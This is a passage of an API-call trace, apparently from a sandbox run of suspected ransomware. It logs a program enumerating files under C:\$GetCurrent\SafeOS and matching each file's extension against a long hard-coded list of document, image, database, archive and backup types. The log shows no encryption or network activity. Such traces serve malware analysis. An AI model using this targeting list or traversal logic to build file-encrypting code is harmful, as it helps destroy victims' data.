[0164.858] lstrcmpiW (lpString1=".dbx", lpString2=".log") returned -1 [0164.858] lstrlenW (lpString=".dc3") returned 4 [0164.858] lstrcmpiW (lpString1=".dc3", lpString2=".log") returned -1 [0164.858] lstrlenW (lpString=".dcm") returned 4 [0164.858] lstrcmpiW (lpString1=".dcm", lpString2=".log") returned -1 [0164.858] lstrlenW (lpString=".dcr") returned 4 [0164.858] lstrcmpiW (lpString1=".dcr", lpString2=".log") returned -1 [0164.858] lstrlenW (lpString=".der") returned 4 [0164.858] lstrcmpiW (lpString1=".der", lpString2=".log") returned -1 [0164.858] lstrlenW (lpString=".dib") returned 4 [0164.858] lstrcmpiW (lpString1=".dib", lpString2=".log") returned -1 [0164.858] lstrlenW (lpString=".dic") returned 4 [0164.858] lstrcmpiW (lpString1=".dic", lpString2=".log") returned -1 [0164.858] lstrlenW (lpString=".dif") returned 4 [0164.858] lstrcmpiW (lpString1=".dif", lpString2=".log") returned -1 [0164.858] lstrlenW (lpString=".divx") returned 5 [0164.858] lstrcmpiW (lpString1=".divx", lpString2="7.log") returned -1 [0164.858] lstrlenW (lpString=".djvu") returned 5 [0164.859] lstrcmpiW (lpString1=".djvu", lpString2="7.log") returned -1 [0164.859] lstrlenW (lpString=".dng") returned 4 [0164.859] lstrcmpiW (lpString1=".dng", lpString2=".log") returned -1 [0164.859] lstrlenW (lpString=".doc") returned 4 [0164.859] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0164.859] lstrlenW (lpString=".docm") returned 5 [0164.859] lstrcmpiW (lpString1=".docm", lpString2="7.log") returned -1 [0164.859] lstrlenW (lpString=".docx") returned 5 [0164.859] lstrcmpiW (lpString1=".docx", lpString2="7.log") returned -1 [0164.859] lstrlenW (lpString=".dot") returned 4 [0164.859] lstrcmpiW (lpString1=".dot", lpString2=".log") returned -1 [0164.859] lstrlenW (lpString=".dotm") returned 5 [0164.859] lstrcmpiW (lpString1=".dotm", lpString2="7.log") returned -1 [0164.859] lstrlenW (lpString=".dotx") returned 5 [0164.859] lstrcmpiW (lpString1=".dotx", lpString2="7.log") returned -1 [0164.859] lstrlenW (lpString=".dpx") returned 4 [0164.859] lstrcmpiW (lpString1=".dpx", lpString2=".log") returned -1 [0164.859] lstrlenW (lpString=".dqy") returned 4 [0164.859] lstrcmpiW (lpString1=".dqy", lpString2=".log") returned -1 [0164.859] FindNextFileW (in: hFindFile=0x729458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="PARTNE~1.LOG")) returned 1 [0164.859] FindNextFileW (in: hFindFile=0x729458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="PARTNE~1.LOG")) returned 0 [0164.859] FindClose (in: hFindFile=0x729458 | out: hFindFile=0x729458) returned 1 [0164.860] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0164.860] FindNextFileW (in: hFindFile=0x729318, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0164.860] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0164.860] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS") returned 21 [0164.860] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x729458 [0165.169] FindNextFileW (in: hFindFile=0x729458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.169] FindNextFileW (in: hFindFile=0x729458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9568f13f, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9568f13f, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x232c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentOOBE.dll", cAlternateFileName="GETCUR~1.DLL")) returned 1 [0165.169] lstrlenW (lpString="GetCurrentOOBE.dll") returned 18 [0165.169] lstrlenW (lpString=".1cd") returned 4 [0165.169] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0165.169] lstrlenW (lpString=".3ds") returned 4 [0165.169] lstrcmpiW (lpString1=".3ds", lpString2=".dll") returned -1 [0165.169] lstrlenW (lpString=".3fr") returned 4 [0165.169] lstrcmpiW (lpString1=".3fr", lpString2=".dll") returned -1 [0165.169] lstrlenW (lpString=".3g2") returned 4 [0165.169] lstrcmpiW (lpString1=".3g2", lpString2=".dll") returned -1 [0165.169] lstrlenW (lpString=".3gp") returned 4 [0165.169] lstrcmpiW (lpString1=".3gp", lpString2=".dll") returned -1 [0165.169] lstrlenW (lpString=".7z") returned 3 [0165.169] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0165.169] lstrlenW (lpString=".accda") returned 6 [0165.169] lstrcmpiW (lpString1=".accda", lpString2="BE.dll") returned -1 [0165.169] lstrlenW (lpString=".accdb") returned 6 [0165.169] lstrcmpiW (lpString1=".accdb", lpString2="BE.dll") returned -1 [0165.169] lstrlenW (lpString=".accdc") returned 6 [0165.169] lstrcmpiW (lpString1=".accdc", lpString2="BE.dll") returned -1 [0165.169] lstrlenW (lpString=".accde") returned 6 [0165.170] lstrcmpiW (lpString1=".accde", lpString2="BE.dll") returned -1 [0165.170] lstrlenW (lpString=".accdt") returned 6 [0165.170] lstrcmpiW (lpString1=".accdt", lpString2="BE.dll") returned -1 [0165.170] lstrlenW (lpString=".accdw") returned 6 [0165.170] lstrcmpiW (lpString1=".accdw", lpString2="BE.dll") returned -1 [0165.170] lstrlenW (lpString=".adb") returned 4 [0165.170] lstrcmpiW (lpString1=".adb", lpString2=".dll") returned -1 [0165.170] lstrlenW (lpString=".adp") returned 4 [0165.170] lstrcmpiW (lpString1=".adp", lpString2=".dll") returned -1 [0165.170] lstrlenW (lpString=".ai") returned 3 [0165.170] lstrcmpiW (lpString1=".ai", lpString2="dll") returned -1 [0165.170] lstrlenW (lpString=".ai3") returned 4 [0165.170] lstrcmpiW (lpString1=".ai3", lpString2=".dll") returned -1 [0165.170] lstrlenW (lpString=".ai4") returned 4 [0165.170] lstrcmpiW (lpString1=".ai4", lpString2=".dll") returned -1 [0165.170] lstrlenW (lpString=".ai5") returned 4 [0165.170] lstrcmpiW (lpString1=".ai5", lpString2=".dll") returned -1 [0165.170] lstrlenW (lpString=".ai6") returned 4 [0165.170] lstrcmpiW (lpString1=".ai6", lpString2=".dll") returned -1 [0165.170] lstrlenW (lpString=".ai7") returned 4 [0165.170] lstrcmpiW (lpString1=".ai7", lpString2=".dll") returned -1 [0165.170] lstrlenW (lpString=".ai8") returned 4 [0165.170] lstrcmpiW (lpString1=".ai8", lpString2=".dll") returned -1 [0165.170] lstrlenW (lpString=".anim") returned 5 [0165.170] lstrcmpiW (lpString1=".anim", lpString2="E.dll") returned -1 [0165.171] lstrlenW (lpString=".arw") returned 4 [0165.171] lstrcmpiW (lpString1=".arw", lpString2=".dll") returned -1 [0165.171] lstrlenW (lpString=".as") returned 3 [0165.171] lstrcmpiW (lpString1=".as", lpString2="dll") returned -1 [0165.171] lstrlenW (lpString=".asa") returned 4 [0165.171] lstrcmpiW (lpString1=".asa", lpString2=".dll") returned -1 [0165.171] lstrlenW (lpString=".asc") returned 4 [0165.171] lstrcmpiW (lpString1=".asc", lpString2=".dll") returned -1 [0165.171] lstrlenW (lpString=".ascx") returned 5 [0165.171] lstrcmpiW (lpString1=".ascx", lpString2="E.dll") returned -1 [0165.171] lstrlenW (lpString=".asm") returned 4 [0165.171] lstrcmpiW (lpString1=".asm", lpString2=".dll") returned -1 [0165.171] lstrlenW (lpString=".asmx") returned 5 [0165.171] lstrcmpiW (lpString1=".asmx", lpString2="E.dll") returned -1 [0165.171] lstrlenW (lpString=".asp") returned 4 [0165.171] lstrcmpiW (lpString1=".asp", lpString2=".dll") returned -1 [0165.171] lstrlenW (lpString=".aspx") returned 5 [0165.171] lstrcmpiW (lpString1=".aspx", lpString2="E.dll") returned -1 [0165.171] lstrlenW (lpString=".asr") returned 4 [0165.171] lstrcmpiW (lpString1=".asr", lpString2=".dll") returned -1 [0165.171] lstrlenW (lpString=".asx") returned 4 [0165.171] lstrcmpiW (lpString1=".asx", lpString2=".dll") returned -1 [0165.171] lstrlenW (lpString=".avi") returned 4 [0165.171] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0165.171] lstrlenW (lpString=".avs") returned 4 [0165.171] lstrcmpiW (lpString1=".avs", lpString2=".dll") returned -1 [0165.171] lstrlenW (lpString=".backup") returned 7 [0165.171] lstrcmpiW (lpString1=".backup", lpString2="OBE.dll") returned -1 [0165.171] lstrlenW (lpString=".bak") returned 4 [0165.172] lstrcmpiW (lpString1=".bak", lpString2=".dll") returned -1 [0165.172] lstrlenW (lpString=".bay") returned 4 [0165.172] lstrcmpiW (lpString1=".bay", lpString2=".dll") returned -1 [0165.172] lstrlenW (lpString=".bd") returned 3 [0165.172] lstrcmpiW (lpString1=".bd", lpString2="dll") returned -1 [0165.172] lstrlenW (lpString=".bin") returned 4 [0165.172] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0165.172] lstrlenW (lpString=".bmp") returned 4 [0165.172] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0165.172] lstrlenW (lpString=".bz2") returned 4 [0165.172] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0165.172] lstrlenW (lpString=".c") returned 2 [0165.172] lstrcmpiW (lpString1=".c", lpString2="ll") returned -1 [0165.172] lstrlenW (lpString=".cdr") returned 4 [0165.172] lstrcmpiW (lpString1=".cdr", lpString2=".dll") returned -1 [0165.172] lstrlenW (lpString=".cer") returned 4 [0165.172] lstrcmpiW (lpString1=".cer", lpString2=".dll") returned -1 [0165.172] lstrlenW (lpString=".cf") returned 3 [0165.172] lstrcmpiW (lpString1=".cf", lpString2="dll") returned -1 [0165.172] lstrlenW (lpString=".cfc") returned 4 [0165.172] lstrcmpiW (lpString1=".cfc", lpString2=".dll") returned -1 [0165.172] lstrlenW (lpString=".cfm") returned 4 [0165.172] lstrcmpiW (lpString1=".cfm", lpString2=".dll") returned -1 [0165.172] lstrlenW (lpString=".cfml") returned 5 [0165.172] lstrcmpiW (lpString1=".cfml", lpString2="E.dll") returned -1 [0165.172] lstrlenW (lpString=".cfu") returned 4 [0165.172] lstrcmpiW (lpString1=".cfu", lpString2=".dll") returned -1 [0165.172] lstrlenW (lpString=".chm") returned 4 [0165.172] lstrcmpiW (lpString1=".chm", lpString2=".dll") returned -1 [0165.173] lstrlenW (lpString=".cin") returned 4 [0165.173] lstrcmpiW (lpString1=".cin", lpString2=".dll") returned -1 [0165.173] lstrlenW (lpString=".class") returned 6 [0165.173] lstrcmpiW (lpString1=".class", lpString2="BE.dll") returned -1 [0165.173] lstrlenW (lpString=".clx") returned 4 [0165.173] lstrcmpiW (lpString1=".clx", lpString2=".dll") returned -1 [0165.173] lstrlenW (lpString=".config") returned 7 [0165.173] lstrcmpiW (lpString1=".config", lpString2="OBE.dll") returned -1 [0165.173] lstrlenW (lpString=".cpp") returned 4 [0165.173] lstrcmpiW (lpString1=".cpp", lpString2=".dll") returned -1 [0165.173] lstrlenW (lpString=".cr2") returned 4 [0165.173] lstrcmpiW (lpString1=".cr2", lpString2=".dll") returned -1 [0165.173] lstrlenW (lpString=".crt") returned 4 [0165.173] lstrcmpiW (lpString1=".crt", lpString2=".dll") returned -1 [0165.173] lstrlenW (lpString=".crw") returned 4 [0165.173] lstrcmpiW (lpString1=".crw", lpString2=".dll") returned -1 [0165.173] lstrlenW (lpString=".cs") returned 3 [0165.173] lstrcmpiW (lpString1=".cs", lpString2="dll") returned -1 [0165.173] lstrlenW (lpString=".css") returned 4 [0165.173] lstrcmpiW (lpString1=".css", lpString2=".dll") returned -1 [0165.173] lstrlenW (lpString=".csv") returned 4 [0165.173] lstrcmpiW (lpString1=".csv", lpString2=".dll") returned -1 [0165.173] lstrlenW (lpString=".cub") returned 4 [0165.173] lstrcmpiW (lpString1=".cub", lpString2=".dll") returned -1 [0165.173] lstrlenW (lpString=".dae") returned 4 [0165.173] lstrcmpiW (lpString1=".dae", lpString2=".dll") returned -1 [0165.173] lstrlenW (lpString=".dat") returned 4 [0165.173] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0165.173] lstrlenW (lpString=".db") returned 3 [0165.173] lstrcmpiW (lpString1=".db", lpString2="dll") returned -1 [0165.174] lstrlenW (lpString=".dbf") returned 4 [0165.174] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0165.174] lstrlenW (lpString=".dbx") returned 4 [0165.174] lstrcmpiW (lpString1=".dbx", lpString2=".dll") returned -1 [0165.174] lstrlenW (lpString=".dc3") returned 4 [0165.174] lstrcmpiW (lpString1=".dc3", lpString2=".dll") returned -1 [0165.174] lstrlenW (lpString=".dcm") returned 4 [0165.174] lstrcmpiW (lpString1=".dcm", lpString2=".dll") returned -1 [0165.174] lstrlenW (lpString=".dcr") returned 4 [0165.174] lstrcmpiW (lpString1=".dcr", lpString2=".dll") returned -1 [0165.174] lstrlenW (lpString=".der") returned 4 [0165.174] lstrcmpiW (lpString1=".der", lpString2=".dll") returned -1 [0165.174] lstrlenW (lpString=".dib") returned 4 [0165.174] lstrcmpiW (lpString1=".dib", lpString2=".dll") returned -1 [0165.174] lstrlenW (lpString=".dic") returned 4 [0165.174] lstrcmpiW (lpString1=".dic", lpString2=".dll") returned -1 [0165.174] lstrlenW (lpString=".dif") returned 4 [0165.174] lstrcmpiW (lpString1=".dif", lpString2=".dll") returned -1 [0165.174] lstrlenW (lpString=".divx") returned 5 [0165.174] lstrcmpiW (lpString1=".divx", lpString2="E.dll") returned -1 [0165.174] lstrlenW (lpString=".djvu") returned 5 [0165.174] lstrcmpiW (lpString1=".djvu", lpString2="E.dll") returned -1 [0165.174] lstrlenW (lpString=".dng") returned 4 [0165.174] lstrcmpiW (lpString1=".dng", lpString2=".dll") returned 1 [0165.174] lstrlenW (lpString=".doc") returned 4 [0165.174] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0165.174] lstrlenW (lpString=".docm") returned 5 [0165.174] lstrcmpiW (lpString1=".docm", lpString2="E.dll") returned -1 [0165.174] lstrlenW (lpString=".docx") returned 5 [0165.175] lstrcmpiW (lpString1=".docx", lpString2="E.dll") returned -1 [0165.175] lstrlenW (lpString=".dot") returned 4 [0165.175] lstrcmpiW (lpString1=".dot", lpString2=".dll") returned 1 [0165.175] lstrlenW (lpString=".dotm") returned 5 [0165.175] lstrcmpiW (lpString1=".dotm", lpString2="E.dll") returned -1 [0165.175] lstrlenW (lpString=".dotx") returned 5 [0165.175] lstrcmpiW (lpString1=".dotx", lpString2="E.dll") returned -1 [0165.175] lstrlenW (lpString=".dpx") returned 4 [0165.175] lstrcmpiW (lpString1=".dpx", lpString2=".dll") returned 1 [0165.175] lstrlenW (lpString=".dqy") returned 4 [0165.175] lstrcmpiW (lpString1=".dqy", lpString2=".dll") returned 1 [0165.175] lstrlenW (lpString=".dsn") returned 4 [0165.175] lstrcmpiW (lpString1=".dsn", lpString2=".dll") returned 1 [0165.175] lstrlenW (lpString=".dt") returned 3 [0165.175] lstrcmpiW (lpString1=".dt", lpString2="dll") returned -1 [0165.175] lstrlenW (lpString=".dtd") returned 4 [0165.175] lstrcmpiW (lpString1=".dtd", lpString2=".dll") returned 1 [0165.175] lstrlenW (lpString=".dwg") returned 4 [0165.175] lstrcmpiW (lpString1=".dwg", lpString2=".dll") returned 1 [0165.175] lstrlenW (lpString=".dwt") returned 4 [0165.175] lstrcmpiW (lpString1=".dwt", lpString2=".dll") returned 1 [0165.175] lstrlenW (lpString=".dx") returned 3 [0165.175] lstrcmpiW (lpString1=".dx", lpString2="dll") returned -1 [0165.175] lstrlenW (lpString=".dxf") returned 4 [0165.175] lstrcmpiW (lpString1=".dxf", lpString2=".dll") returned 1 [0165.175] lstrlenW (lpString=".edml") returned 5 [0165.176] lstrcmpiW (lpString1=".edml", lpString2="E.dll") returned -1 [0165.176] lstrlenW (lpString=".efd") returned 4 [0165.176] lstrcmpiW (lpString1=".efd", lpString2=".dll") returned 1 [0165.176] lstrlenW (lpString=".elf") returned 4 [0165.176] lstrcmpiW (lpString1=".elf", lpString2=".dll") returned 1 [0165.176] lstrlenW (lpString=".emf") returned 4 [0165.176] lstrcmpiW (lpString1=".emf", lpString2=".dll") returned 1 [0165.176] lstrlenW (lpString=".emz") returned 4 [0165.176] lstrcmpiW (lpString1=".emz", lpString2=".dll") returned 1 [0165.176] lstrlenW (lpString=".epf") returned 4 [0165.176] lstrcmpiW (lpString1=".epf", lpString2=".dll") returned 1 [0165.176] lstrlenW (lpString=".eps") returned 4 [0165.176] lstrcmpiW (lpString1=".eps", lpString2=".dll") returned 1 [0165.176] lstrlenW (lpString=".epsf") returned 5 [0165.176] lstrcmpiW (lpString1=".epsf", lpString2="E.dll") returned -1 [0165.176] lstrlenW (lpString=".epsp") returned 5 [0165.176] lstrcmpiW (lpString1=".epsp", lpString2="E.dll") returned -1 [0165.176] lstrlenW (lpString=".erf") returned 4 [0165.176] lstrcmpiW (lpString1=".erf", lpString2=".dll") returned 1 [0165.176] lstrlenW (lpString=".exr") returned 4 [0165.176] lstrcmpiW (lpString1=".exr", lpString2=".dll") returned 1 [0165.176] lstrlenW (lpString=".f4v") returned 4 [0165.176] lstrcmpiW (lpString1=".f4v", lpString2=".dll") returned 1 [0165.176] lstrlenW (lpString=".fido") returned 5 [0165.176] lstrcmpiW (lpString1=".fido", lpString2="E.dll") returned -1 [0165.176] lstrlenW (lpString=".flm") returned 4 [0165.177] lstrcmpiW (lpString1=".flm", lpString2=".dll") returned 1 [0165.177] lstrlenW (lpString=".flv") returned 4 [0165.177] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0165.177] lstrlenW (lpString=".frm") returned 4 [0165.177] lstrcmpiW (lpString1=".frm", lpString2=".dll") returned 1 [0165.177] lstrlenW (lpString=".fxg") returned 4 [0165.177] lstrcmpiW (lpString1=".fxg", lpString2=".dll") returned 1 [0165.177] lstrlenW (lpString=".geo") returned 4 [0165.177] lstrcmpiW (lpString1=".geo", lpString2=".dll") returned 1 [0165.177] lstrlenW (lpString=".gif") returned 4 [0165.177] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0165.177] lstrlenW (lpString=".grs") returned 4 [0165.177] lstrcmpiW (lpString1=".grs", lpString2=".dll") returned 1 [0165.177] lstrlenW (lpString=".gz") returned 3 [0165.177] lstrcmpiW (lpString1=".gz", lpString2="dll") returned -1 [0165.177] lstrlenW (lpString=".h") returned 2 [0165.177] lstrcmpiW (lpString1=".h", lpString2="ll") returned -1 [0165.177] lstrlenW (lpString=".hdr") returned 4 [0165.177] lstrcmpiW (lpString1=".hdr", lpString2=".dll") returned 1 [0165.177] lstrlenW (lpString=".hpp") returned 4 [0165.177] lstrcmpiW (lpString1=".hpp", lpString2=".dll") returned 1 [0165.177] lstrlenW (lpString=".hta") returned 4 [0165.177] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0165.177] lstrlenW (lpString=".htc") returned 4 [0165.177] lstrcmpiW (lpString1=".htc", lpString2=".dll") returned 1 [0165.177] lstrlenW (lpString=".htm") returned 4 [0165.177] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0165.177] lstrlenW (lpString=".html") returned 5 [0165.177] lstrcmpiW (lpString1=".html", lpString2="E.dll") returned -1 [0165.177] lstrlenW (lpString=".icb") returned 4 [0165.178] lstrcmpiW (lpString1=".icb", lpString2=".dll") returned 1 [0165.178] lstrlenW (lpString=".ics") returned 4 [0165.178] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0165.178] lstrlenW (lpString=".iff") returned 4 [0165.178] lstrcmpiW (lpString1=".iff", lpString2=".dll") returned 1 [0165.178] lstrlenW (lpString=".inc") returned 4 [0165.178] lstrcmpiW (lpString1=".inc", lpString2=".dll") returned 1 [0165.178] lstrlenW (lpString=".indd") returned 5 [0165.178] lstrcmpiW (lpString1=".indd", lpString2="E.dll") returned -1 [0165.178] lstrlenW (lpString=".ini") returned 4 [0165.178] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0165.178] lstrlenW (lpString=".iqy") returned 4 [0165.178] lstrcmpiW (lpString1=".iqy", lpString2=".dll") returned 1 [0165.178] lstrlenW (lpString=".j2c") returned 4 [0165.178] lstrcmpiW (lpString1=".j2c", lpString2=".dll") returned 1 [0165.178] lstrlenW (lpString=".j2k") returned 4 [0165.178] lstrcmpiW (lpString1=".j2k", lpString2=".dll") returned 1 [0165.178] lstrlenW (lpString=".java") returned 5 [0165.178] lstrcmpiW (lpString1=".java", lpString2="E.dll") returned -1 [0165.178] lstrlenW (lpString=".jp2") returned 4 [0165.178] lstrcmpiW (lpString1=".jp2", lpString2=".dll") returned 1 [0165.178] lstrlenW (lpString=".jpc") returned 4 [0165.178] lstrcmpiW (lpString1=".jpc", lpString2=".dll") returned 1 [0165.178] lstrlenW (lpString=".jpe") returned 4 [0165.178] lstrcmpiW (lpString1=".jpe", lpString2=".dll") returned 1 [0165.178] lstrlenW (lpString=".jpeg") returned 5 [0165.178] lstrcmpiW (lpString1=".jpeg", lpString2="E.dll") returned -1 [0165.178] lstrlenW (lpString=".jpf") returned 4 [0165.178] lstrcmpiW (lpString1=".jpf", lpString2=".dll") returned 1 [0165.178] lstrlenW (lpString=".jpg") returned 4 [0165.179] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0165.179] lstrlenW (lpString=".jpx") returned 4 [0165.179] lstrcmpiW (lpString1=".jpx", lpString2=".dll") returned 1 [0165.179] lstrlenW (lpString=".js") returned 3 [0165.179] lstrcmpiW (lpString1=".js", lpString2="dll") returned -1 [0165.179] lstrlenW (lpString=".jsf") returned 4 [0165.179] lstrcmpiW (lpString1=".jsf", lpString2=".dll") returned 1 [0165.179] lstrlenW (lpString=".json") returned 5 [0165.179] lstrcmpiW (lpString1=".json", lpString2="E.dll") returned -1 [0165.179] lstrlenW (lpString=".jsp") returned 4 [0165.179] lstrcmpiW (lpString1=".jsp", lpString2=".dll") returned 1 [0165.179] lstrlenW (lpString=".kdc") returned 4 [0165.179] lstrcmpiW (lpString1=".kdc", lpString2=".dll") returned 1 [0165.179] lstrlenW (lpString=".kmz") returned 4 [0165.179] lstrcmpiW (lpString1=".kmz", lpString2=".dll") returned 1 [0165.179] lstrlenW (lpString=".kwm") returned 4 [0165.179] lstrcmpiW (lpString1=".kwm", lpString2=".dll") returned 1 [0165.179] lstrlenW (lpString=".lasso") returned 6 [0165.179] lstrcmpiW (lpString1=".lasso", lpString2="BE.dll") returned -1 [0165.179] lstrlenW (lpString=".lbi") returned 4 [0165.179] lstrcmpiW (lpString1=".lbi", lpString2=".dll") returned 1 [0165.179] lstrlenW (lpString=".lgf") returned 4 [0165.179] lstrcmpiW (lpString1=".lgf", lpString2=".dll") returned 1 [0165.179] lstrlenW (lpString=".lgp") returned 4 [0165.179] lstrcmpiW (lpString1=".lgp", lpString2=".dll") returned 1 [0165.179] lstrlenW (lpString=".log") returned 4 [0165.179] lstrcmpiW (lpString1=".log", lpString2=".dll") returned 1 [0165.179] lstrlenW (lpString=".m1v") returned 4 [0165.179] lstrcmpiW (lpString1=".m1v", lpString2=".dll") returned 1 [0165.180] lstrlenW (lpString=".m4a") returned 4 [0165.180] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0165.180] lstrlenW (lpString=".m4v") returned 4 [0165.180] lstrcmpiW (lpString1=".m4v", lpString2=".dll") returned 1 [0165.180] lstrlenW (lpString=".max") returned 4 [0165.180] lstrcmpiW (lpString1=".max", lpString2=".dll") returned 1 [0165.180] lstrlenW (lpString=".md") returned 3 [0165.180] lstrcmpiW (lpString1=".md", lpString2="dll") returned -1 [0165.180] lstrlenW (lpString=".mda") returned 4 [0165.180] lstrcmpiW (lpString1=".mda", lpString2=".dll") returned 1 [0165.180] lstrlenW (lpString=".mdb") returned 4 [0165.180] lstrcmpiW (lpString1=".mdb", lpString2=".dll") returned 1 [0165.180] lstrlenW (lpString=".mde") returned 4 [0165.180] lstrcmpiW (lpString1=".mde", lpString2=".dll") returned 1 [0165.180] lstrlenW (lpString=".mdf") returned 4 [0165.180] lstrcmpiW (lpString1=".mdf", lpString2=".dll") returned 1 [0165.180] lstrlenW (lpString=".mdw") returned 4 [0165.180] lstrcmpiW (lpString1=".mdw", lpString2=".dll") returned 1 [0165.180] lstrlenW (lpString=".mef") returned 4 [0165.180] lstrcmpiW (lpString1=".mef", lpString2=".dll") returned 1 [0165.180] lstrlenW (lpString=".mft") returned 4 [0165.180] lstrcmpiW (lpString1=".mft", lpString2=".dll") returned 1 [0165.180] lstrlenW (lpString=".mfw") returned 4 [0165.180] lstrcmpiW (lpString1=".mfw", lpString2=".dll") returned 1 [0165.180] lstrlenW (lpString=".mht") returned 4 [0165.180] lstrcmpiW (lpString1=".mht", lpString2=".dll") returned 1 [0165.180] lstrlenW (lpString=".mhtml") returned 6 [0165.180] lstrcmpiW (lpString1=".mhtml", lpString2="BE.dll") returned -1 [0165.180] lstrlenW (lpString=".mka") returned 4 [0165.181] lstrcmpiW (lpString1=".mka", lpString2=".dll") returned 1 [0165.181] lstrlenW (lpString=".mkidx") returned 6 [0165.181] lstrcmpiW (lpString1=".mkidx", lpString2="BE.dll") returned -1 [0165.181] lstrlenW (lpString=".mkv") returned 4 [0165.181] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0165.181] lstrlenW (lpString=".mos") returned 4 [0165.181] lstrcmpiW (lpString1=".mos", lpString2=".dll") returned 1 [0165.181] lstrlenW (lpString=".mov") returned 4 [0165.181] lstrcmpiW (lpString1=".mov", lpString2=".dll") returned 1 [0165.181] lstrlenW (lpString=".mp3") returned 4 [0165.181] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0165.181] lstrlenW (lpString=".mp4") returned 4 [0165.181] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0165.181] lstrlenW (lpString=".mpeg") returned 5 [0165.181] lstrcmpiW (lpString1=".mpeg", lpString2="E.dll") returned -1 [0165.181] lstrlenW (lpString=".mpg") returned 4 [0165.181] lstrcmpiW (lpString1=".mpg", lpString2=".dll") returned 1 [0165.181] lstrlenW (lpString=".mpv") returned 4 [0165.181] lstrcmpiW (lpString1=".mpv", lpString2=".dll") returned 1 [0165.181] lstrlenW (lpString=".mrw") returned 4 [0165.181] lstrcmpiW (lpString1=".mrw", lpString2=".dll") returned 1 [0165.181] lstrlenW (lpString=".msg") returned 4 [0165.181] lstrcmpiW (lpString1=".msg", lpString2=".dll") returned 1 [0165.181] lstrlenW (lpString=".mxl") returned 4 [0165.181] lstrcmpiW (lpString1=".mxl", lpString2=".dll") returned 1 [0165.181] lstrlenW (lpString=".myd") returned 4 [0165.181] lstrcmpiW (lpString1=".myd", lpString2=".dll") returned 1 